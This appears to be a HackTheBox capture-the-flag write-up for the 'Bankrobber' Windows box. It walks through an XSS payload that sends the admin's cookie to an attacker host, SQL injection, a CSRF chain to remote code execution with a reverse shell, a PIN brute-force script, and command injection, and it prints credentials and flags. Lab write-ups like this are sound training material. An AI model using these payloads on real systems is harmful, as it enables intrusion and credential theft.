Summary

Bankrobber,a Windows box created by HackTheBox user Gioo and Cneeliz, was an overall Insane difficulty box. The initial foothold was about finding an XXS vector and use that to leak the admin cookie and use that to access the admin panel.There we find an SQLInjection using that we can grab the source code for an backdoorchecker.php also when we try to run that we see that it can only be ran from localhost. which means we will have to use that XXS and convert that to an CSRF attack and use that to get an RCE. And we have user. Privilege Escalation on this box was like port-forwarding a filtered port to local and using the application on nc, we write an script to brute-force the pin for the application. Doing a Command Injection on that we can get a shell as Administrator.

Enumeration

nmap scan

markdown

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-10 13:15 EST
Nmap scan report for 10.10.10.154
Host is up (0.15s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
443/tcp  open  ssl/http     Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql        MariaDB (unauthorized)
Service Info: Host: BANKROBBER; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.69 seconds

Looking in SMB we see we don’t have Guest login so we cann’t get anything there.

So we focus on http

User

So lets try to just register and login as that user.

Login in we see

trying that we see that has to be approved by Admin so lets try XXS that and grab the admin cookie.

which we do using

http

POST /user/transfer.php HTTP/1.1

Host: 10.10.10.154

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://10.10.10.154/user/

Content-type: application/x-www-form-urlencoded

Content-Length: 463

Connection: close

Cookie: id=3; username=dGVzdA%3D%3D; password=dGVzdA%3D%3D


fromId=3&toId=1&amount=1&comment=<img src='x' onerror ="document.location='http://10.10.X.X:8080/?c='+document.cookie">

Using this we can grab the cookie of admin as

base64 decoding them we get the creds for admin as admin:Hopelessromantic

Using the admin creds and logging in we get something intresting.

Checking Notes.txt

text

- Move all files from the default Xampp folder: TODO
- Encode comments for every IP address except localhost: Done
- Take a break..

Testing for SQLInjection on Search.php we see that is vulnerable to UNION Injection
using that we can grab the backdoorchecker.php

backdoorchecker.php

php

<?php
include('../link.php');
include('auth.php');

$username = base64_decode(urldecode($_COOKIE['username']));
$password = base64_decode(urldecode($_COOKIE['password']));
$bad 	  = array('$(','&');
$good 	  = "ls";

if(strtolower(substr(PHP_OS,0,3)) == "win"){
	$good = "dir";
}

if($username == "admin" && $password == "Hopelessromantic"){
	if(isset($_POST['cmd'])){
			// FILTER ESCAPE CHARS
			foreach($bad as $char){
				if(strpos($_POST['cmd'],$char) !== false){
					die("You're not allowed to do that.");
				}
			}
			// CHECK IF THE FIRST 2 CHARS ARE LS
			if(substr($_POST['cmd'], 0,strlen($good)) != $good){
				die("It's only allowed to use the $good command");
			}

			if($_SERVER['REMOTE_ADDR'] == "::1"){
				system($_POST['cmd']);
			} else{
				echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
			}
	}
} else{
	echo "You are not allowed to use this function!";
}
?>

Looking in that we see that $bad = array('$(','&'); $( and & is blacklisted and request from $_SERVER['REMOTE_ADDR'] == "::1" are only allowed.
So we can go back the the XSS and use that to create a CSRF using

NOTE: I am using nishang Invoke-PowerShellTcp.ps1

and we get a shell back as cortin and we have user.

and we can grab user.txt

f635346600876a43441cf1c6e94769ac

Privilege Escalation

Running some recon we see port 910 is open and a suspicious app in C:\ is running

so we port forward using portfwd in metasploit.

we can use access the application on our 910 port using nc

shell

$ nc 127.0.0.1 910

So I write a script to crack the pin

python

from telnetlib import Telnet
import sys

filepath=sys.argv[1]
with open(filepath) as fp:
   line = fp.readline()
   cnt = 1
   while line:
       # print("Line {}: {}".format(cnt, line.strip()))
       line = fp.readline()
       cnt += 1
       with Telnet('localhost', 910) as tn:
         tn.read_until(b"[$]")
         print(line.encode('ascii'))
         tn.write(line.encode('ascii'))
         read = tn.read_all().decode("utf-8");
         tn.interact()
         print(read)
         if "denied" in read:
             pass
         else:
          print("Pin"+line)
          tn.close()
          break

And this give me the pin as 0021
Injecting a command on Amount field we can get a shell as Administrator

(payload.exe is a meterpreter reverse shell)

and we capture the session and get a Administrator Shell.

and we can read root.txt

aa65d8e6216585ea636eb07d4a59b197

and we have pwned BankRobber 💃